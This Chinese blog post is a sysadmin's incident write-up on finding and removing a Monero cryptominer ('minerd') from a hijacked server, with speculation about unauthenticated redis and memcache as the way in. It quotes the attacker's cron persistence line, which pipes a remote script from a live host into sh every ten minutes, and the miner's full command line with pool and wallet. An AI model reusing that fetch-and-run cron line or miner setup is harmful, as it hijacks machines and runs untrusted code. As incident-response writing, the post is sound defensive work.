收到一条短信服务器CPU跑到了90%,赶紧登陆服务器top查看一下,这个叫minerd
的程序消耗这么多,这是个什么东西啊?
# find / -name minerd
/opt/minerd
# ls
KHK75NEOiq33 minerd
在opt目录下,并删除这两个文件
ps aux|grep minerd
SLsl Jul15 34:25 /opt/minerd -B -a cryptonight -ostratum+tcp://xmr.crypto-pool.fr:6666 -u48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKkcvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp-p x
杀掉这个进程
但是过了不到1分钟这个东西又出现了,会发现怎么删除这个东西都删不掉
然后赶紧看了下任务计划
#crontab -e
*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh
不一会,opt下又出现了minerd这个程序
然后grep了下这个关键字查找下系统中的东西,果然,还有个配置文件
# grep -r "xmr.crypto-pool" /
/usr/local/etc/minerd.conf:-B -acryptonight -o stratum+tcp://xmr.crypto-pool.fr:8080 -u47TS1NQvebb3Feq91MqKdSGCUq18dTEdmfTTrRSGFFC2fK85NRdABwUasUA8EUaiuLiGa6wYtv5aoR8BmjYsDmTx9DQbfRX-p x
自己删除
这下看你还有不
卧槽,还有
我又继续过滤了下这个以配置文件为关键字的文件
果然,还有个伪装的程序
果断干掉
然后ps aux看下还在执行,直接杀掉
这下世界又恢复了宁静!
查看这个网址看了下,挖掘我的数据啊。
再想是什么原因让黑客登录我的服务器那?排除密码破解
下面有3点做的不够完善
1、刚装的rap接口管理系统bug
2、memcache未授权访问漏洞
3、redis未授权
暂时没找到更准确的原因...待续
本文出自 “停止奋斗=停止生命” 博客,请务必保留此出处http://53cto.blog.51cto.com/9899631/1826989
原文地址:http://53cto.blog.51cto.com/9899631/1826989
